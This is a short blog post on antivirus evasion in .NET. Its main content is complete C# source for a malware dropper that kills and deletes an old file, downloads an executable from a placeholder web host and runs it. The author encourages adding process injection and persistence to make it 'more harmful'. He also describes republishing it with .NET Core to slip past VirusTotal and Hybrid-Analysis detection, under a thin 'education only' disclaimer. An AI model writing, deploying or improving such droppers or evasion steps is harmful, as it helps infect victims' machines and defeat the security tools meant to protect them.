Open in app

Sign in

Write

Sign in

Antivirus evasion techniques in .NET

Cherif Yassir
3 min readFeb 17, 2021
Hacker vs Antivirus

Before we start, I want to tell you that everything you find here is just for education purpose only, so use it at your own risk.

Let’s start by making this dropper (it’s just a malicious program designed to deliver a specific malware to a victim computer), my intention is to first make it detectable by AV then make it undetectable after that. I write a simple dropper in C# (since I use it in my daily job).

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;
using System.Threading.Tasks;namespace Lkala
{
    class Program
    {
        static async Task Main(string[] args)
        {
            string filePath = Path.Combine(Environment.CurrentDirectory, "Lkala-update.exe");
            if (File.Exists(filePath) is true)
                try 
                { 
                    File.Delete(filePath);
                }
                catch (SystemException xe) when (xe is UnauthorizedAccessException) 
                {
                    SaveDelete(filePath);
                }using var webClient = new WebClient();
            webClient.DownloadFileCompleted += DownloadFileCompleted(filePath);
            await webClient.DownloadFileTaskAsync(new Uri("http://yourwebsite/Lkala-update.exe"), filePath);static void SaveDelete(string name)
            {
                Process[] proc = Process.GetProcessesByName(Path.GetFileNameWithoutExtension(name));
                if (proc.Length > 0)
                {
                    proc[0].Kill();
                    Thread.Sleep(500);
                    File.Delete(name);
                }
            }static AsyncCompletedEventHandler DownloadFileCompleted(string filePath) =>
                new AsyncCompletedEventHandler((object sender, AsyncCompletedEventArgs args) => {
                    Process.Start(filePath);
                });
            
        }
    }
}

I know it’s a shitty dropper but you can add process injection, melt, mutex, startup run, etc., to make it more powerful and harmful ;)

When you compile this code using a dotnet framework (just for info it’s a C# 8) and you upload the file to virustotal and hybrid-analysis for static and runtime scan, you will discover that it will be detected by 2 Antivirus and in hybrid-analysis, telling you that it’s a malicious file for sure.

Virustotal static scan
Hybrid-analysis runtime scan

So, our dropper is detected in static and runtime scan.

Using ExeInfo PE, will tell us that my dropper is a dotnet program.

Exeinfo

Then I will try to compile it using dotnet core 3.1 and publish it using this configuration.

publish config

Hybrid-analysis uses windows 7, that is why We will target this OS version

Let’s scan our dropper using VT and HA again.

Bingo!!

VT static scan for dotnet core dropper
HA runtime scan

if you open it using Exeinfo PE, you notice that it tells you that this program was coded in C++. It’s another topic we will discuss it later.

Exeinfo PE result

The problem with this technique is that your file will be bigger than usual. At first the file was 7KB, but with the dotnet core publish the size will be 59Mo.

Good bye.

Antivirus
Evasion

--

--

Cherif Yassir

Written by Cherif Yassir

0 Followers

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams